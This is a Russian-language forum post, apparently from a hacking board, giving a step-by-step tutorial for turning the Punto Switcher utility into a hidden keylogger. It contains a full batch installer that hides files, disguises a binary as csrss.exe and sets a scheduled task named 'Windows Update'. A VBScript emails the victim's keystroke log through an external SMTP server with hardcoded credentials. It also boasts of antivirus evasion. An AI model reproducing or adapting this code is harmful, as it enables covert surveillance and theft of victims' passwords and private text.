Как-то мы уже делали статью о том как можно использовать легальные программы исключительно в своих добрых целях...
На многих форумах я слышал что vbs срипты неопасны, либо непопулярны, поэтому их пропуск АВ некритичен.
В этой теме предлагаю порассуждать на тему кейлоггеров, т.к. RMS надоел уже вкрай...
За основу возьмём Пунто свитчер или как его там неважно:
Хоть автор данного ролика и просил не использовать это в коварных целях, но я неудержался...
Что будет делать наш кейлоггер:
1)Тихонечко ставится без админских прав;
2)Ну разумеется логи будем отправлять на маил, в обход ВСЕХ файерволов и АВ (При настройках по умолчанию разумеется), сделаем это при помощи тулзы Wscript.exe короче скрипта VBS, а эта тулза есть в любой винде и имеет цифровую подпись и файеры её ОЧЕНЬ любят пропускать в сеть...
Итак что-же нам нужно:
1)Файлы этого свитчара, настроенные как в ролике выше (Можно взять во вложении);
2)Винрар, или 7zip неважно, для создание SFX-архива;
Вроде всё итак приступем:
Создадим папку, куда скопируем файлы нашего свитчара, далее сделаем инсталяционный батник и кинем его в эту папку:
Код:
@echo on
set WTime=5
md "%userprofile%\PP"
md "%userprofile%\PP\Data"
md "%userprofile%\PP\User Data"
attrib +s +h +r "%userprofile%\PP"
copy /y "diary.dll" "%userprofile%\PP\diary.dll"
copy /y "diary.exe" "%userprofile%\PP\diary.exe"
copy /y "layouts.exe" "%userprofile%\PP\layouts.exe"
copy /y "libeay32.dll" "%userprofile%\PP\libeay32.dll"
copy /y "csrss.exe" "%userprofile%\PP\csrss.exe"
copy /y "preferences.xml" "%userprofile%\PP\User Data\preferences.xml"
copy /y "ps64ldr.exe" "%userprofile%\PP\ps64ldr.exe"
copy /y "ps.dat" "%userprofile%\PP\Data\ps.dat"
copy /y "pshook64.dll" "%userprofile%\PP\pshook64.dll"
copy /y "pshook.dll" "%userprofile%\PP\pshook.dll"
copy /y "replace.dat" "%userprofile%\PP\User Data\replace.dat"
copy /y "ssleay32.dll" "%userprofile%\PP\ssleay32.dll"
copy /y "translit-en.dat" "%userprofile%\PP\Data\translit-en.dat"
copy /y "translit-ru.dat" "%userprofile%\PP\Data\translit-ru.dat"
copy /y "triggers.dat" "%userprofile%\PP\Data\triggers.dat"
copy /y "user.dic" "%userprofile%\PP\User Data\user.dic"
copy /y "userdata.local" "%userprofile%\PP\userdata.local"
copy /y "UpdateWindows.vbs" "%userprofile%\PP\UpdateWindows.vbs"
sc config Schedule start= auto
sc start Schedule
schtasks /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F
start "" "%userprofile%\PP\csrss.exe"
Что делает батник:
Копирует файлы свитчера в рабочую дирректорию жертвы, при этом создаёт хитрую папку pp, почему хитрую, а потому-что её не хера не видно даже если разрешить отображения скрытых папок...
Обратите внимание на:
Код:
schtasks /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F
Код:
Dim WshS
Set WshS = WScript.CreateObject("WScript.Shell")
Set objMsg = CreateObject("CDO.Message")
Set Config = CreateObject("CDO.Configuration")
Set Config = objMsg.Configuration
objMsg.From = "[email protected]"
objMsg.To = "[email protected]"
objMsg.Subject = "Test sending email from script"
objMsg.Textbody = "This is a body of E-mail."
WshS.Run "taskkill /f /im Exp1orer.exe",0
Wscript.Sleep 3000
objMsg.AddAttachment WshS.ExpandEnvironmentStrings("%UserProfile%")+"\PP\User Data\diary.dat"
Config("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Config("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Config("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Config("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Config("http://schemas.microsoft.com/cdo/configuration/sendusername") = "wcwadc"
Config("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "wcwadc888"
Config("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
Config.Fields.Update
objMsg.Send
WshS.Run "Exp1orer.exe"
Wscript.Echo "Отправка завершена"
Wscript.Quit
В vbs всё учёл, даже когда блокируется diary.dat свитчером, приходится завершать процесс перед отправкой, а потом опять запускать наш кейлоггеп, к сожалению задание не всегда устанавливается, поэтому можно придумать что-то другое, например написать простенькую прогу, которая будет запускать скрипт например раз в пять минут...
Как сделать SFX архив здесь:https://ru-sfera.pw/threads/delaem-krutoj-kripto-dzhojner-i-obxodim-detekt-vt.1858/
Ну и самое главное, что ФУД:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Пароль на архив 111, можно распокавать винраром и сконфигурировать как захотите....